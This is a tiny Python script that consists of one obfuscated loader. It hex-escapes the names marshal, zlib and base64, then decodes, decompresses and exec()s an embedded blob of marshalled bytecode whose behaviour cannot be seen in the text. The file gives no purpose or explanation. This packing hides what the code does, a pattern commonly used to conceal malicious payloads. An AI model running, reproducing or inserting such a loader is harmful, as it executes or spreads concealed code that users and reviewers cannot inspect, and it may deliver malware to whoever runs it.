#!/usr/bin/env python
#-*- coding:utf-8 -*-

exec(__import__('\x6D\x61\x72\x73\x68\x61\x6C').loads(__import__('\x7A\x6C\x69\x62').decompress(__import__('\x62\x61\x73\x65\x36\x34').b64decode('eJx1Uc1Kw0AQnk1bkYLiI9STOe6cepEi9OahB3PrJcTsViKbRNoNKHjTF/FVfBrfQmd2J00ouExm5+ebb5YvJchJ6LsDBYcbCgyZAgdQK9gqUCaBTypN4IOTKWwTMDPI0jPCVr90UkWRvyT3sq8an++6pvRV25RcV0K/Zvo5AwHegbmyMLeJ07N+OqbsXlN+WnBh8Pa+c1W7fl6u/DmnrqgfTbGaRk4C8Qu+vzJrF/XbomyNvfY/VNKoydghhgCD6XAPrdiJd9+MsWAFJP0RRth030XEYzvOouzp+VEP+4/kJ/uH+niPUMm+ERr1Jp2wFCxVTv/Ad3ub5w+sjGeNdq54GhT9X9a6NZ2zQdYDuyu4SP4Ap8ZkHQ=='))))

# vim:ft=python ts=4 sts=4 sw=4 et